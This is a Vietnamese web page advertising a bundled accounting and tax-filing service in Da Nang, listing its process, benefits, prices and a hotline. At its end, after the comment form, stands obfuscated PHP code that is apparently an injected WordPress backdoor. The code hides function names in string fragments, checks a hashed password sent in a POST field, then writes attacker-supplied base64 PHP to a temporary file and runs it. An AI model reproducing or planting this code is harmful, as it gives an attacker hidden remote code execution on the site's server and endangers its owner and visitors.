1

Công ty làm dịch vụ kế toán thuế trọn gói tại Đà Nẵng

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

Doanh nghip bạn cn thuê dịch vụ kế toán trọn gói tại Đà Nẵng? dịch vụ báo cáo tài chính, dịch vụ dọn dẹp và hoàn thiện sổ sách, dịch vụ kế toán nội bộ, dịch vụ hoàn thuế gtgt,..?

Giới thiệu cho bạn đơn vị: KẾ TOÁN HÀ NỘI GROUP hiện đứng đầu toàn Quốc về làm dịch vụ kế toán cho Doanh Nghiệp uy tín – chất lượng – đảm bảo.

Lý do Khách hàng chn Dịch vụ Kế toán trọn gói tại Đà Nẵng ca K TOÁN HÀ NI:

Được thành lập từ 2005, K TOÁN HÀ NI luôn là người bạn đồng hành của Doanh nghiệp. Đến nay, chúng tôi là đối tác tin cậy của trên 500 DN khắp cả nước. Sự tin tưởng và thành công của quý Doanh nghiệp luôn là kim chỉ nam cho phương châm hoạt động của chúng tôi.

Kê khai và nộp thuế hàng tháng, hàng quý là công việc quan trọng và bắt buộc đối với các công ty hiện nay, nắm bắt được tình hình này, chúng tôi cung cấp đến quý doanh nghiệp dịch vụ kê khai thuế trọn gói nhằm giúp quý doanh nghiệp tiết kiệm thời gian và chi phí trong việc kê khai thuế mỗi tháng (mỗi quý) và nộp đầy đủ các loại báo cáo thuế cho cơ quan thuế đúng thời hạn.

MQúy Doanh nghip tham kho >> Fanpage K TOÁN HÀ NI GROUP.

Đối với ”Dịch vụ kế toán trọn gói” K TOÁN HÀ NI không ngừng hoàn thiện bằng việc chịu trách nhiệm trọn vẹn quy trình dịch vụ, tiết kiệm chi phí, giảm thiểu rủi ro cho các Doanh nghiệp khi quyết toán thuế. Hỗ trợ 24/7, chuyên nghiệp, hiệu quả, chính xác và trên hết, uy tín được chúng tôi đặt lên hàng đầu!

Chúng tôi sẽ có Kế toán trưởng riêng Phụ trách Khu vực Đà Nẵng làm việc và đảm bảo lợi ích sát sao nhất cho Doanh nghiệp bạn!

Quy trình làm dịch vụ kế toán trọn gói tại Đà Nẵng gồm:

 • Nhận bản sao chứng từ phát sinh trong tháng do doanh nghiệp cung cấp
 • Tiến hành kiểm tra tính hợp lý, hợp lệ của các chứng từ, hóa đơn mang về
 • Lập báo cáo hoá đơn chứng từ mua vào, bán ra, tờ khai thuế hàng tháng/quý
 • Tư vấn, kiểm tra số liệu doanh thu và chi hàng quý và trách nhiệm pháp lý, thủ tục mua hóa đơn lần đầu, thủ tục nộp thuế môn bài tại Kho bạc nhà nước, ….
 • Tạm tính và nộp thuế thu nhập doanh nghiệp tạm tính hàng quý
 • Thay mặt doanh nghiệp nộp tờ khai, báo cáo tháng, quý, năm.
 • Làm báo cáo quyết toán thuế TNDN, TNCN cho doanh nghiệp.

Những lợi ích khi sử dụng dịch vụ kế toán tại Đà Nẵng như sau:

 • Tiết kiệm thời gian và chi phí, đại diện cho doanh nghiệp trong tất cả các giao dịch với Cơ quan thuế, Cơ quan nhà nước khác (BHXH, BHYT,..) để Doanh nghiệp kinh doanh tốt nhất.
 • Tư vấn đăng ký thuế ban đầu – Kê khai và Quyết toán thuế các loại thuế (Thuế môn bài, Thuế GTGT; Thuế TNCN; Thuế TNDN)-Tư vấn hợp đồng lao động-Tư vấn xây dựng hệ thống thang bảng lương đóng BHXH-Tư vấn xây dựng quy chế chế công tác phí-Tư vấn xây dựng quy trình thu chi…
 • Chúng tôi sẽ chịu trách nhiệm trước Cơ quan thuế về số liệu kê khai và Quyết toán thuế mà  KẾ TOÁN HÀ NỘI đã kê khai với Cơ quan thuế đồng thời chịu thiệt hại vật chất do lỗi kê khai gây ra.
 • Doanh nghiệp sẽ được KẾ TOÁN HÀ NỘI đứng ra giải trình bảo vệ lợi ích trước Cơ quan thuế với mục đích nhằm tối ưu hóa số thuế phải nộp.
 • Tư vấn cho doanh nghiệp các hoạt động hàng ngày liên quan đến vấn đề về Hóa đơn chứng từ đầu vào và Viết hóa đơn đầu ra. Cân đối doanh thu chi phí sao cho thuế đóng là thấp nhất nhưng vẫn trong khuôn khổ pháp luật cho phép.
 • Doanh nghiệp không phải tốn thời gian nhiều về thuế, không còn phải đau đầu về thuế mà dành hết thời gian vào kinh doanh. Công việc thuế và Kế toán đã có KẾ TOÁN HÀ NỘI phụ trách.

Báo giá dịch vụ kế toán trọn gói tại Đà Nẵng:

 • Sẽ không còn là vấn đề lo lắng của Doanh nghiệp bạn nữa.
 • Chi phí Dịch vụ chỉ từ 1 -2 triệu/ tháng ( thay vì mức lương 5- 7 triệu cho một Kế toán trưởng), Chúng tôi sẽ luôn cố gắng lại lợi ích tối đa cho Doanh nghiệp bạn.
 • Căn cứ theo quy mô, loại hình hoạt động, số hóa đơn chứng từ phát sinh trong tháng, doanh thu chi phí của DN…, chúng tôi sẽ có báo giá riêng!

“K TOÁN HÀ NI – ĐI TÁC ĐNG HÀNH TIN CY CA DOANH NGHIP”

Hãy nhc máy gi ngay cho chúng tôi đ được h tr tt nht!
Liên hệ phòng Dịch vụ kế toán tại tp Đà Nẵng
Hotline: 0973.761.751 – Mr Ngọc

Email: ketoan.vnpro@gmail.com

BÀI VIẾT LIÊN QUAN

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}